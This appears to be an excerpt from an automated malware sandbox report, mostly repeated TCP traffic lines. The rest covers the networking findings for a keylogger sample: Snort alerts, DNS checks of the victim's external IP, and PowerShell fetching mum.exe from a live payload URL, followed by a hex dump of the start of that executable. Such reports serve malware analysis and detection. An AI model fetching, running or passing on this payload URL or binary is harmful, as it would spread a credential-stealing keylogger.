          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 132.226.8.169:80
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 193.122.130.0:80
          Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.122.130.0:80

          Networking

          barindex
          Source: TrafficSnort IDS: 2842536 ETPRO TROJAN 404/Snake/Matiex Keylogger Style External IP Check 192.168.2.22:49173 -> 132.226.8.169:80
          Source: TrafficSnort IDS: 2842536 ETPRO TROJAN 404/Snake/Matiex Keylogger Style External IP Check 192.168.2.22:49174 -> 193.122.130.0:80
          Source: TrafficSnort IDS: 2842536 ETPRO TROJAN 404/Snake/Matiex Keylogger Style External IP Check 192.168.2.22:49175 -> 193.122.130.0:80
          Source: C:\Users\user\AppData\Roaming\mum.exeDNS query: name: checkip.dyndns.org
          Source: C:\Users\user\AppData\Roaming\mum.exeDNS query: name: checkip.dyndns.org
          Source: C:\Users\user\AppData\Roaming\mum.exeDNS query: name: checkip.dyndns.org
          Source: C:\Users\user\AppData\Roaming\mum.exeDNS query: name: checkip.dyndns.org
          Source: C:\Users\user\AppData\Roaming\mum.exeDNS query: name: checkip.dyndns.org
          Source: C:\Users\user\AppData\Roaming\mum.exeDNS query: name: checkip.dyndns.org
          Source: C:\Users\user\AppData\Roaming\mum.exeDNS query: name: checkip.dyndns.org
          Source: C:\Users\user\AppData\Roaming\mum.exeDNS query: name: checkip.dyndns.org
          Source: C:\Users\user\AppData\Roaming\mum.exeDNS query: name: checkip.dyndns.org
          Source: C:\Users\user\AppData\Roaming\mum.exeDNS query: name: checkip.dyndns.org
          Source: C:\Users\user\AppData\Roaming\mum.exeDNS query: name: checkip.dyndns.org
          Source: C:\Users\user\AppData\Roaming\mum.exeDNS query: name: checkip.dyndns.org
          Source: Yara matchFile source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.3837910.9.raw.unpack, type: UNPACKEDPE
          Source: Joe Sandbox ViewASN Name: UTMEMUS UTMEMUS
          Source: Joe Sandbox ViewASN Name: ORACLE-BMC-31898US ORACLE-BMC-31898US
          Source: global trafficHTTP traffic detected: GET /mum.exe HTTP/1.1Host: f0705964.xsph.ruConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Tue, 23 Aug 2022 11:42:48 GMTContent-Type: application/octet-streamContent-Length: 829952Last-Modified: Mon, 22 Aug 2022 22:52:30 GMTConnection: keep-aliveETag: "630408ae-caa00"Expires: Tue, 30 Aug 2022 11:42:48 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 99 06 04 63 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 a2 0c 00 00 06 00 00 00 00 00 00 ee c0 0c 00 00 20 00 00 00 e0 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 c0 0c 00 57 00 00 00 00 e0 0c 00 5c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 a0 0c 00 00 20 00 00 00 a2 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 5c 03 00 00 00 e0 0c 00 00 04 00 00 00 a4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0d 00 00 02 00 00 00 a8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 c0 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 86 0c 00 ac 39 00 00 03 00 00 00 53 00 00 06 d0 60 00 00 18 26 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7a 02 28 16 00 00 0a 02 03 7d 01 00 00 04 02 28 17 00 00 0a 6f 18 00 00 0a 7d 03 00 00 04 2a 00 1b 30 02 00 1b 00 00 00 01 00 00 11 02 7b 01 00 00 04 0a 06 1f fd 2e 04 06 17 33 0a 00 de 07 02 28 04 00 00 06 dc 2a 00 01 10 00 00 02 00 11 00 02 13 00 07 00 00 00 00 1b 30 04 00 fc 00 00 00 02 00 00 11 02 7b 01 00 00 04 0b 07 2c 0b 07 17 2e 66 16 0a dd e5 00 00 00 02 15 7d 01 00 00 04 02 16 7d 06 00 00 04 02 17 7d 07 00 00 04 02 1f fe 73 0a 00 00 06 6f 03 00 00 0a 7d 08 00 00 04 02 1f fd 7d 01 00 00 04 38 7f 00 00 00 02 02 7b 08 00 00 04 6f 02 00 00 0a 7d 09 00 00 04 02 02 7b 07 00 00 04 7d 02 00 00 04 02 17 7d 01 00 00 04 17 0a dd 86 00 00 00 02 1f fd 7d 01 00 00 04 02 7b 04 00 00 04 0d 02 09 17 59 7d 04 00 00 04 02 7b 04 00 00 04 2d 04 16 0a 2b 48 02 7b 07 00 00 04 0c 02 08 02 7b 06 00 00 04 58 02 7b 04 00 00 04 58 20 8d 3b e0 7c 02 7b 09 00 00 04 58 61 7d 07 00 00 04 02 08 7d 06
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Tue, 23 Aug 2022 11:42:52 GMTContent-Type: application/octet-streamContent-Length: 829952Last-Modified: Mon, 22 Aug 2022 22:52:30 GMTConnection: keep-aliveETag: "630408ae-caa00"Expires: Tue, 30 Aug 2022 11:42:52 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 99 06 04 63 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 a2 0c 00 00 06 00 00 00 00 00 00 ee c0 0c 00 00 20 00 00 00 e0 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 c0 0c 00 57 00 00 00 00 e0 0c 00 5c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 a0 0c 00 00 20 00 00 00 a2 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 5c 03 00 00 00 e0 0c 00 00 04 00 00 00 a4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0d 00 00 02 00 00 00 a8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 c0 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 86 0c 00 ac 39 00 00 03 00 00 00 53 00 00 06 d0 60 00 00 18 26 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7a 02 28 16 00 00 0a 02 03 7d 01 00 00 04 02 28 17 00 00 0a 6f 18 00 00 0a 7d 03 00 00 04 2a 00 1b 30 02 00 1b 00 00 00 01 00 00 11 02 7b 01 00 00 04 0a 06 1f fd 2e 04 06 17 33 0a 00 de 07 02 28 04 00 00 06 dc 2a 00 01 10 00 00 02 00 11 00 02 13 00 07 00 00 00 00 1b 30 04 00 fc 00 00 00 02 00 00 11 02 7b 01 00 00 04 0b 07 2c 0b 07 17 2e 66 16 0a dd e5 00 00 00 02 15 7d 01 00 00 04 02 16 7d 06 00 00 04 02 17 7d 07 00 00 04 02 1f fe 73 0a 00 00 06 6f 03 00 00 0a 7d 08 00 00 04 02 1f fd 7d 01 00 00 04 38 7f 00 00 00 02 02 7b 08 00 00 04 6f 02 00 00 0a 7d 09 00 00 04 02 02 7b 07 00 00 04 7d 02 00 00 04 02 17 7d 01 00 00 04 17 0a dd 86 00 00 00 02 1f fd 7d 01 00 00 04 02 7b 04 00 00 04 0d 02 09 17 59 7d 04 00 00 04 02 7b 04 00 00 04 2d 04 16 0a 2b 48 02 7b 07 00 00 04 0c 02 08 02 7b 06 00 00 04 58 02 7b 04 00 00 04 58 20 8d 3b e0 7c 02 7b 09 00 00 04 58 61 7d 07 00 00 04 02 08 7d 06
          Source: global trafficHTTP traffic detected: GET /mum.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: f0705964.xsph.ruConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: powershell.exe, 00000012.00000002.993914279.00000000035AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: httP://f0705964.xsph.ru
          Source: powershell.exe, 00000012.00000002.962331313.0000000000230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: httP://f0705964.xsph.ru/mum.exe
          Source: powershell.exe, 00000009.00000002.947506272.000000000387A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: httP://f0705964.xsph.ru/mum.exePE
          Source: powershell.exe, 00000004.00000002.919275004.000000000364A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.993914279.00000000035AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: httP://f0705964.xsph.ru/mum.exePEQ
          Source: mum.exe, 0000000F.00000002.1283209898.00000000026E8000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001A.00000002.1283632776.00000000026E9000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000022.00000002.1283300680.00000000026E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
